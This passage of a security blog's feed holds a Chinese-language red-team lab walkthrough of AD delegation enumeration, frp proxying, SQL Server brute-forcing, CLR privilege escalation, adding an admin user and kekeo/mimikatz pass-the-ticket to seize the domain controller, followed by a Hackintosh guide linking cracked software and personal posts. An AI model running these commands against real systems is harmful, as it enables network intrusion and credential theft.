class="line"></span><br><span class="line"> ```bash</span><br><span class="line"># Query hosts configured with unconstrained delegation:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName</span><br><span
class="line"># 查询配置了非约束委派的用户:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName</span><br><span class="line"># 查询配置了约束委派的主机:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto</span><br><span class="line"></span><br><span class="line"># 查询配置了约束委派的用户:</span><br><span class="line">AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto</span><br></pre></td></tr></table></figure></li></ul><p><img src="https://img-blog.csdnimg.cn/img_convert/116c34bb03d87808ac292643985a8c04.png" alt="image-20220508135251614"></p><p>找到了一个 sqlserver 的用户是被设置了约束委派,得想办法搞到这个用户的账密</p><p>上传 fscan.exe 到靶机进行信息收集和漏洞扫描</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c942aa4136fb566135a2dedc25fcef44.png" alt="image-20220508154210862"></p><blockquote><p>PS:如果没有扫到 1433 端口,就进虚拟机把 SQL server 启动,启动不了</p><p>看这篇文章:<a href="https://link.juejin.cn/?target=https://www.fengjunzi.com/blog-25573.html">链接</a>,因为过试用期了,需要升级重新输入密码</p><p>正常启动</p><p><img src="https://img-blog.csdnimg.cn/img_convert/774c84d30e556aa9241040f6b1b5b127.png" alt="image-20220508154057558"></p></blockquote><p>根据他开放的端口尝试以下操作:</p><ol><li>80 端口 web 漏洞</li><li>1433 SQL server 漏洞</li><li>445 smb 等端口系统漏洞</li></ol><p>其他拿域控思路:<a href="https://mp.weixin.qq.com/s/maa01jOdXw_G_4uJ-_YZXg">域控被突破的几种途径v2</a></p><h3 id="二层Frp代理"><a href="#二层Frp代理" class="headerlink" title="二层Frp代理"></a>二层Frp代理</h3><p><strong>现在尝试 80 端口漏洞</strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/9b86bb5c67caaa0eb198584eec49e631.png" alt="image-20220508161840412"></p><ol><li><p>搭建使用 frp 多层代理,修改 weblogic 的 frp 配置文件,weblogic 
既是客户端,也是服务端,需要修改 frps.ini,通过 cs 上传 frps 和 frps.ini </p><p><img src="https://img-blog.csdnimg.cn/img_convert/a367563e507a3f034b0f0f1ccac95772.png" alt="image-20220508155905811"></p><p>启动 frps</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell frps.exe -c frps.ini</span><br></pre></td></tr></table></figure></li><li><p>数据服务器开启 frpc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell frpc.exe -c frpc.ini</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = 10.10.20.12</span><br><span class="line">server_port = 1111</span><br><span class="line"></span><br><span class="line">[http_proxy]</span><br><span class="line">type = tcp</span><br><span class="line">remote_port = 7777</span><br><span class="line">plugin = socks5</span><br></pre></td></tr></table></figure><p>建立链接</p><p><img src="https://img-blog.csdnimg.cn/img_convert/968eddd5fb0a1d42c28dcef289da251a.png" alt="image-20220508162507851"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/a1c326e00ef08d6044fbeaffee2a26fe.png" alt="image-20220508162514238"></p></li><li><p>在攻击者的 windows 电脑上可以用 proxifier 设置代理链</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1333ef1bf22ffe4641e66e9b7c32da93.png" alt="image-20220508162704748"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/8cfc19e7dd68cea57c7d5b4e501c3476.png" alt="image-20220508162717407"></p><p>在攻击者的 windows 电脑上可以正常访问 
10.10.10.18</p><p><img src="https://img-blog.csdnimg.cn/img_convert/6a4a64f75b78a08e5dd25dceb79c95cb.png" alt="image-20220508162922505"></p></li></ol><p>发现 80 端口并没有什么利用点,尝试利用 SQL sever,因为现在搭建了二层代理所以部分操作可以用 windows 物理机直接攻击</p><h3 id="打数据服务器SQL-server"><a href="#打数据服务器SQL-server" class="headerlink" title="打数据服务器SQL server"></a>打数据服务器SQL server</h3><p>尝试爆破 SQL server 密码</p><p>使用工具成功爆破用户密码</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c86b9fd9c6de214ab6d1ae4f49bcb06d.png" alt="image-20220508163342992"></p><p>可以看到流量被转发</p><p><img src="https://img-blog.csdnimg.cn/img_convert/03fdc9c84e8e7e87995b8d3c80f64d9e.png" alt="image-20220508163339943"></p><p>这样就拿到了域控主机的 SQL server 密码</p><p>随后利用 <a href="https://github.com/uknowsec/SharpSQLTools/releases/tag/41">SharpSQLTools.exe</a> 工具对其进行 xp_cmdshell 调用系统命令,或者 SqlKnife 这个工具</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/b6c72ab3586150c1979c1565fe0529e1.png" alt="image-20220508164101746"></p><p>却认为域控 ip</p><p><img src="https://img-blog.csdnimg.cn/img_convert/069317cf5d6c5ce468e149e6b66148ea.png" alt="image-20220508164215612"></p><p>目前的权限是<code>nt authority\network service</code> 即为普通服务权限,</p><blockquote><p>由于目标机器不出网不存在让他下载我们的 exe,随后使用 MSF + Proxychains 调用 xpcmdshell 模块上线到 MSF,但是失败了</p><p><img src="https://img-blog.csdnimg.cn/img_convert/3d8fcf2b2391f0daf9842b55a4938c85.png" alt="image-20220508164827961"></p><p>既然上线失败且目标是 iis,那么想办法找到 iis 到目录写个一句话吧</p><p>一般 iis 的目录是:<code>C:\inetpub\wwwroot</code>,那么查看下是否存在</p></blockquote><p><img src="https://img-blog.csdnimg.cn/img_convert/1d60d5dee831bc2c8e23867617f451b4.png" alt="image-20220508165057165"></p><p>确实存在此目录,尝试写入文件,权限太小失败</p><p><img 
src="https://img-blog.csdnimg.cn/img_convert/498ee7ee42cf07fc69323991f67d2078.png" alt="image-20220508165248135"></p><p>在 MSSQL 中使用 CLR 组件提权,提权原理可以看这篇文章:<a href="https://www.anquanke.com/post/id/250346">https://www.anquanke.com/post/id/250346</a></p><p>在搜这个提权的时候还发现了一个华点就是搜关键词 install_clr 就可以搜到这个靶场的 wp</p><p>使用 SharpSQLTools 开启目标 clr,进行提权</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master install_clr <span class="built_in">whoami</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/9bc05fd0b2ce2fbb4013621e7c05d245.png" alt="image-20220508165906554"></p><p>然后启用并调用命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr</span><br><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/d412192364596aaf3c2d6f7870eaeedd.png" alt="image-20220508170007322"></p><p>提权成功,只能说太牛皮了</p><p>添加一个管理员权限用户,用户名为 ocean.com 密码为 qwe.123</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user ocean.com qwe.123 /add"</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/f04f800faa76bc14fdcb66ca6b4e0eaf.png" alt="image-20220508170331564"></p><p>升级为 admin 组</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net localgroup 
administrators ocean.com /add"</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/4e58c6005c44c8dd6f21b3ea2375090a.png" alt="image-20220508170508054"></p><p>查看用户</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user"</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/307f38106054b70103329cc532fb1536.png" alt="image-20220508170619457"></p><blockquote><p>其他师傅试了多种方法都不行,他们最终选择了 msf,我就直接用 msf 了,其他师傅的文章可以在参考连接中找到</p></blockquote><h3 id="上线CS"><a href="#上线CS" class="headerlink" title="上线CS"></a>上线CS</h3><p>漏洞利用拿下的 win7 做中继,用 CS 生成马,通过 meterpreter 传上去 msf 的 payload,但是需要首先为 kali 设置代理,因为之前使用 frp 搭建了二层隧道,所以这里只需要设置 proxychains 的配置文件即可</p><p>1.设置 kali proxychains 代理保证 kali msf 可以访问到 10.10.10.18</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vi /etc/proxychains.conf</span><br></pre></td></tr></table></figure><p>代理链就和 Windows 物理机一样</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1a498e32d4a5036d366e0887dde0333b.png" alt="image-20220508172723808"></p><p>2.上线 msf</p><p>使用代理启动 msf</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains msfconsole</span><br></pre></td></tr></table></figure><p>使用 mssql_clr_payload 模块</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/mssql/mssql_clr_payload</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/726f210a987afbf931b7d9695bfa704a.png" alt="image-20220508172257116"></p><p>3.生成中转上线的 cs 
马,新建一个监听器,这里需要多层代理</p><p>生成 beacon.exe</p><p>4.通过 msf 上传 beacon.exe 并且执行,上线 sc,但是只有服务权限</p><p>使用 SharpSQLTools.exe 去执行 beacon,获取高权限用户,拿到 SQL server 主机</p><h2 id="5-域内委派拿域控"><a href="#5-域内委派拿域控" class="headerlink" title="5.域内委派拿域控"></a>5.域内委派拿域控</h2><p>cs 中拿到用户密码</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5afe8cbae21133e1c7e51738c5e275fb.png" alt="image-20220509080607350"></p><p>之前信息搜集的时候我们知道 <code>sqlserver</code> 是一个约束委派的用户,我们可以通过约束委派攻击来接管域控</p><p>通过 cs 上传工具 kekeo,利用 kekeo 请求该用户的 TGT:<code>[email protected][email protected]</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kekeo.exe <span class="string">"tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"</span></span><br></pre></td></tr></table></figure><p>然后使用这张 TGT (<code>[email protected][email protected]</code>) 获取域机器的 ST:<code>[email protected]@[email protected]</code></p> <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kekeo.exe <span class="string">"tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red"</span></span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/16f1fffa49d4a716d55f2c7a337faf31.png" alt="image-20220509082530523"></p><p>使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt:</p> <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::ptt [email protected]@[email protected]</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/1fece20a25a8d35fa088584fa6f91fcb.png" alt="image-20220509082625206"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/42c7e47bd5c09d227728b21ba0ea006a.png" 
alt="image-20220509082653026"></p><p>参考链接</p><p><a href="http://moonflower.fun/index.php/2022/03/06/300/">http://moonflower.fun/index.php/2022/03/06/300/</a></p><p><a href="https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ">https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ</a></p><p><a href="https://xie.infoq.cn/article/2edac2bc38860fa97386f7c27">https://xie.infoq.cn/article/2edac2bc38860fa97386f7c27</a></p><p><img src="https://img-blog.csdnimg.cn/img_convert/d717a424deb896a4ca97a7f1f83da1f8.png"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"><br>从外网 Weblogic 打进内网,再到约束委派接管域控</p>
<p>靶场来自渗透攻击红队,官方 wp 及下载地</summary>
<category term="RedTeam" scheme="https://oceansec.github.io/categories/RedTeam/"/>
<category term="靶场,Redteam,内网" scheme="https://oceansec.github.io/tags/%E9%9D%B6%E5%9C%BA-Redteam-%E5%86%85%E7%BD%91/"/>
</entry>
<entry>
<title>Mechrevo Z2 Hackintosh dual-boot conversion project</title>
<link href="https://oceansec.github.io/2023/12/05/%E6%9C%BA%E6%A2%B0%E9%9D%A9%E5%91%BDz2%E9%BB%91%E8%8B%B9%E6%9E%9C%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92/"/>
<id>https://oceansec.github.io/2023/12/05/%E6%9C%BA%E6%A2%B0%E9%9D%A9%E5%91%BDz2%E9%BB%91%E8%8B%B9%E6%9E%9C%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92/</id>
<published>2023-12-05T02:59:04.862Z</published>
<updated>2023-02-14T02:44:20.820Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"><br>Mechrevo Z2 Hackintosh conversion project</p><p>The original 256G system drive was far too small, so while SSDs were cheap I bought a Dahua C900Plus-B 1T SSD; together with the HIKVISION C2000Pro 1T I had added to the machine earlier, the plan is a Win + Mac dual-boot productivity machine</p><h1 id="黑苹果效果展示"><a href="#黑苹果效果展示" class="headerlink" title="黑苹果效果展示"></a>Hackintosh result showcase</h1><p><img src="https://img-blog.csdnimg.cn/386740a945a342d7a0c4a8fd1fd101cd.png" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/bc7b8daf21c24323bf6e4dca86885c0a.gif" alt="在这里插入图片描述"></p><p>There are plenty of detailed Hackintosh tutorials on Bilibili; you can also read Guoguang's blog at <a href="https://apple.sqlsec.com/">https://apple.sqlsec.com/</a>, which has text and video tutorials and a very detailed introduction to the Hackintosh EFI bootloader</p><p>Of course, experts online also provide direct-install images with a pre-adapted EFI: <a href="https://www.cmbs-soft.com/">https://www.cmbs-soft.com/</a> provides EFI boot files and direct-install images for the Mechrevo laptop series</p><h1 id="直装镜像的黑苹果安装步骤"><a href="#直装镜像的黑苹果安装步骤" class="headerlink" title="直装镜像的黑苹果安装步骤"></a>Hackintosh installation steps with a direct-install image</h1><p>The steps below are for a dual-drive Windows + macOS setup, i.e. Windows on one drive and macOS on the other, so that if one system has a problem the other remains stable. Single-drive dual-boot is much the same</p><h2 id="1-写入U盘使用将镜像写入U盘"><a href="#1-写入U盘使用将镜像写入U盘" class="headerlink" title="1.写入U盘使用将镜像写入U盘"></a>1. Write the image to a USB drive</h2><p>The USB drive must be 16G or larger; for stability, avoid USB 2.0 and grey-market drives</p><p>There are many tools for writing the image to a USB drive; pick one based on the OS you are on now. Anyone wanting a Hackintosh is probably on Windows. Options and downloads:</p><ul><li><a href="https://www.acutesystems.com/scrtm.htm">transmac</a>, <a href="https://www.mfpud.com/topics/940/">burning tutorial</a> (the tool I used; it worked on the first try)</li><li><a href="https://balenaetcher.en.softonic.com/">balenaEtcher</a>, <a href="https://apple.sqlsec.com/2-U%E7%9B%98%E5%88%B6%E4%BD%9C/2-2/">burning tutorial</a> (my real experience on Windows 11: more than ten attempts at writing the USB drive, none succeeded; the upside is that it is cross-platform)</li><li><a href="https://rufus.ie/zh/">rufus</a></li></ul><h2 id="2-将BIOS中Secureboot关闭后从U盘启动"><a href="#2-将BIOS中Secureboot关闭后从U盘启动" class="headerlink" title="2.将BIOS中Secureboot关闭后从U盘启动"></a>2. Disable Secure Boot in the BIOS and boot from the USB drive</h2><p>Press the appropriate hotkey during reboot to enter the BIOS (F10 on the Mechrevo series), find Secure Boot in the BIOS and disable it, then save and exit</p><p>Because the USB drive is plugged in, a boot-device selection screen appears after saving and starting up, similar to the one below. If an OpenCore entry is present, choose it directly; if not, choose the first "UEFI OS" entry carrying the USB drive's name, which is the OpenCore partition</p><p><img src="https://img-blog.csdnimg.cn/img_convert/9ad60f05117a29c0a0a16f05ec875051.png" alt="截屏2023-02-13 16.25.30"></p><p>After selecting it, the OpenCore menu appears</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1af2b4beb21aa09f39601d785eef1cfe.png" alt="截屏2023-02-13 16.29.16"></p><h2 id="3-在磁盘工具中抹除预留的安装分区或磁盘"><a href="#3-在磁盘工具中抹除预留的安装分区或磁盘" class="headerlink" title="3.在磁盘工具中抹除预留的安装分区或磁盘"></a>3. Erase the reserved installation partition or disk in Disk Utility</h2><p><img src="https://img-blog.csdnimg.cn/img_convert/074a960b63eaf659579eb9c2bdb95bf2.png" alt="img"></p><p>Select the drive or partition where macOS will be installed and click Erase in the top right</p><ol><li>Selecting a drive installs macOS on a separate drive, suitable for dual-drive dual-boot or Hackintosh only</li><li>Selecting a partition means single-drive dual-boot; for the partition layout see <a href="https://apple.sqlsec.com/5-%E5%AE%9E%E6%88%98%E6%BC%94%E7%A4%BA/5-5/">Guoguang's tutorial</a></li></ol><p>The screenshot below shows the partition case; when selecting a whole drive there is an extra "Scheme" option: choose GUID Partition Map</p><p><img src="https://img-blog.csdnimg.cn/img_convert/51db9608d7f9b7af172dcfbfeafb4b9e.jpeg" alt="img"></p><p>Any name will do; the format must be macOS's APFS, which is analogous to NTFS on Windows. Note that a Mac cannot read an NTFS-formatted USB drive; format USB drives as exFAT so they work across both systems</p><p>After erasing, quit Disk Utility</p><h2 id="4-选择安装MACOS"><a href="#4-选择安装MACOS" class="headerlink" title="4.选择安装MACOS"></a>4. Choose Install macOS</h2><p>What follows is the normal macOS installation: select the disk just erased and proceed through the graphical installer; the system reboots several times during installation</p><h2 id="5-安装完成后使用DiskGenius和EasyUEFI将引导转移至本地"><a href="#5-安装完成后使用DiskGenius和EasyUEFI将引导转移至本地" class="headerlink" title="5.安装完成后使用DiskGenius和EasyUEFI将引导转移至本地"></a>5. After installation, move the bootloader to the local drive with DiskGenius and EasyUEFI</h2><p>After the previous step the system is usable, but macOS is currently booting from the USB drive, so the next task is to copy the bootloader to the SSD. This can be done from Windows or from macOS: Windows can use DiskGenius, macOS can use <a href="https://macdownload.informer.com/opencore-configurator/download/">OCC (OpenCore Configurator)</a></p><p>After opening it, click the OCC icon in the top right, find the drive the system was installed on, and click "Mount Partition"</p><p><img src="https://img-blog.csdnimg.cn/img_convert/39fe83c8947ef09252518fa2f3a532f0.png" alt="截屏2023-02-13 17.16.26"></p><p>Mount the USB drive's boot partition</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1b8f54875b8d1cd85e70df10b955e558.png" alt="截屏2023-02-13 17.20.43"></p><p>Copy the OC directory into the drive's directory</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d2f05fcfb1409bb7869aa10579f6c7dd.jpeg" alt="img"></p><p>Since mine is a dual-drive dual-boot this time, no tool is needed to create a boot entry; just set the disk's bootloader as the first boot option in the BIOS</p><p>For single-drive dual-boot, use EasyUEFI or DiskGenius to create the boot entry</p><p><strong>EasyUEFI cracked-version download</strong>: <a href="https://sqlsec.lanzouw.com/i4amxzmj1cj">https://sqlsec.lanzouw.com/i4amxzmj1cj</a></p><p>EasyUEFI steps:</p><ol><li><p>Choose Manage EFI boot entries</p><p><img src="https://img-blog.csdnimg.cn/img_convert/2f414769a83f91fcb91cf6937d4a7928.png" alt="截屏2023-02-13 17.24.29"></p></li><li><p>Choose Create new entry</p><p><img src="https://img-blog.csdnimg.cn/img_convert/2a966fbc8c5b868c83e7491319536e20.jpeg" alt="img"></p></li><li><p>For the OS type choose Linux or Other, any description, for the target partition choose the drive's first ESP boot partition, then click Browse, select OpenCore.efi under the EFI/OC/ directory and click OK</p><p><img src="https://img-blog.csdnimg.cn/img_convert/ee78ddeae0e4cd7e0868ec861ba81ee7.jpeg" alt="img"></p><p>Move the entry up to first place</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a70b1898ac0eb0ddd0c42d7090af038d.jpeg" alt="img"></p></li></ol><p>If it still cannot be selected at boot, change the boot order in the BIOS. With that, the Hackintosh installation is complete</p><h1 id="优化-系统迁移"><a href="#优化-系统迁移" class="headerlink" title="优化-系统迁移"></a>Optimization - system migration</h1><p>The original system drive was a 256G SATA3 SSD. I now have two 1T SSDs: one already has macOS, and the other is to replace the 256G drive holding Windows by migrating the system to the 1T SSD, which puts both SSD slots to use</p><p>System migration is also simple: DiskGenius does it directly. There are other tools too, such as the MagicBox tool bundled with HIKVISION SSDs, which can migrate the system or clone the whole drive</p><ol><li><p>DiskGenius Tools - System Migration</p><p><img src="https://img-blog.csdnimg.cn/img_convert/205d0651d48765672d5d09bd5fde2245.png" alt="系统迁移"></p></li><li><p>Choose the target disk; it may be smaller than the source disk, but its capacity must exceed the total used data on the source</p><p><img src="https://img-blog.csdnimg.cn/img_convert/8e71e0c0936863e3e6f915a5b7d7f5ca.png" alt="系统迁移"></p><p>Then follow the prompts: erase the disk, choose hot migration as the migration mode, wait a moment and reboot</p></li></ol><p>For details see the official DiskGenius tutorial: <a href="https://www.diskgenius.cn/help/system-migration.php">link</a></p><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h1><ol><li><p>The system has no real bugs so far; minor versions can be updated directly in System Settings, major versions mean waiting for an updated EFI from the experts</p><p>After updating, remember to turn FileVault off; the settings after an update may show the little house icon checked again, remember to uncheck it</p></li><li><p>Because the wireless card is Intel, Wi-Fi and Bluetooth work normally, but Sidecar and AirDrop do not and would need a Broadcom card; on most machines the discrete GPU has no driver and cannot be used</p></li><li><p>Also, the Windows system disk uses the NTFS file system and the macOS disk uses APFS; the format both systems can use is exFAT, so use it for USB drives, and in a single-drive dual-boot setup the other drive can use this format as well</p><blockquote><p>NTFS read/write: macOS natively supports only reading NTFS partitions, not writing; forcing NTFS write support with scripts or software may cause Windows blue-screen errors, so it is recommended to carve out an exFAT partition for read/write use</p></blockquote></li><li><p>If a tool keeps failing, consider switching to another one</p></li><li><p>In macOS the machine is noticeably faster than in Win11, memory usage is lower, and the fan spins less</p></li><li><p>Keyboard: some key mappings differ depending on the keyboard; trackpad gestures are certainly not as good as on a MacBook</p></li><li><p>An unexpected bonus: a Kingston 16G USB drive that Windows could neither recognize nor format became usable after erasing it in macOS. Amazing!!!</p></li></ol><p><img src="https://img-blog.csdnimg.cn/6af074c49a8e4c2ea4913845183d1d70.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"><br>机械革命z2黑苹果改造计划</p>
<p>原来的系统硬盘才256G实在太小了,趁固态便宜搞</summary>
<category term="黑苹果" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="黑苹果" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>New blog introduction; old blog address: https://oceansec.blog.csdn.net</title>
<link href="https://oceansec.github.io/2023/12/05/%E6%96%B0%E5%8D%9A%E5%AE%A2%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%97%A7%E5%8D%9A%E5%AE%A2%E5%9C%B0%E5%9D%80%EF%BC%9Aoceansec.blog.csdn.net/"/>
<id>https://oceansec.github.io/2023/12/05/%E6%96%B0%E5%8D%9A%E5%AE%A2%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%97%A7%E5%8D%9A%E5%AE%A2%E5%9C%B0%E5%9D%80%EF%BC%9Aoceansec.blog.csdn.net/</id>
<published>2023-12-05T02:59:04.860Z</published>
<updated>2022-09-07T03:16:18.740Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p><p>Welcome to Ocean's new blog. The old blog <a href="https://oceansec.blog.csdn.net/">oceansec.blog.csdn.net</a> will no longer be updated; the new blog will go deeper in what it publishes, no more beginner posts haha, and I hope everyone learns something here</p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p>
<p>欢迎来到 Ocean 的新博客,旧博客 <a href="https://oceans</summary>
<category term="介绍" scheme="https://oceansec.github.io/categories/%E4%BB%8B%E7%BB%8D/"/>
<category term="介绍" scheme="https://oceansec.github.io/tags/%E4%BB%8B%E7%BB%8D/"/>
</entry>
<entry>
<title>Mid-year summary</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%B9%B4%E4%B8%AD%E7%BB%93/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%B9%B4%E4%B8%AD%E7%BB%93/</id>
<published>2023-12-05T02:59:04.858Z</published>
<updated>2022-09-09T06:17:38.430Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p><p>It seems the first half of the year held only two things: looking for an internship, and the internship, haha. I wrote up the job hunt before, so this time it is mainly about the internship</p><p>Two months ago I joined JD as a Blue Army intern; I remember stepping out of the subway station and seeing the JD building right there, and I have to say JD really is big. Having just entered the working world I was still not used to it: always forgetting to clock in and out, never knowing what to say in meetings. Two months have helped me grow a lot; I learned that work has to produce output, and learned the self-cultivation of a corporate drone. As for the work, my day-to-day tasks were basically three:</p><ul><li>Learning and skill-building</li><li>Internal enablement</li><li>HW</li></ul><p>First, my learning. The Blue Army really gives interns room to learn and grow; basically half the time can be self-scheduled for study. When attacking intranets before, I used tools like mimikatz a lot without understanding why they achieve what they do, and a competent security engineer cannot skip learning Windows, because the Windows ecosystem really is huge. Intranet work is all Windows protocols, NTLM and Kerberos; AV evasion is a battle of wits with antivirus in a Windows environment, and how can you do that without understanding Windows; and phishing is inseparable from Word and the PE file format</p><p>I started from the Windows kernel and then moved on to Windows security mechanisms, which involve a lot of C/C++/C# code, so it was fairly heavy going; with two HW exercises in between I still have not got to the bottom of it. The Windows road is long and needs deeper study; I hope to become an AV-evasion master one day, and I will tidy up my notes and post them on the blog later</p><p>As for HW, who would have thought a two-month internship would coincide with the only two HW exercises of the year; not sure whether that was lucky or unlucky. The day-night reversal took some getting used to, and I got honeypot PTSD; I learned that only with full anonymity can you operate freely without tiptoeing. HW taught me a lot of tricks, and I felt the joy of the phisher: a fish in hand and the world is yours. The C2 the Blue Army experts built in-house is really good. There is still a lot to learn; the road is long, and I will keep learning from the experts</p><p>Through the internship I finally experienced working life, met many experts, and saw my own shortcomings and the many parts of the stack I still need to fill in. There is a big gap between studying and practice, which is a reminder for future learning: every learning goal needs an output. Be a competent worker</p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png" alt="img"></p>
<p>好像上半年只有两件事情,找实习和实习哈哈哈,找实习之前有总结过,这次主要说下实习</p</summary>
<category term="总结" scheme="https://oceansec.github.io/categories/%E6%80%BB%E7%BB%93/"/>
<category term="总结" scheme="https://oceansec.github.io/tags/%E6%80%BB%E7%BB%93/"/>
</entry>
<entry>
<title>Mechrevo Z2 Hackintosh conversion project part 2 - macOS utilities &amp; pentest tools</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92%E7%AC%AC%E4%BA%8C%E7%95%AA-%E5%AE%9E%E7%94%A8%E8%BD%AF%E4%BB%B6/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92%E7%AC%AC%E4%BA%8C%E7%95%AA-%E5%AE%9E%E7%94%A8%E8%BD%AF%E4%BB%B6/</id>
<published>2023-12-05T02:59:04.856Z</published>
<updated>2023-02-14T09:04:55.960Z</updated>
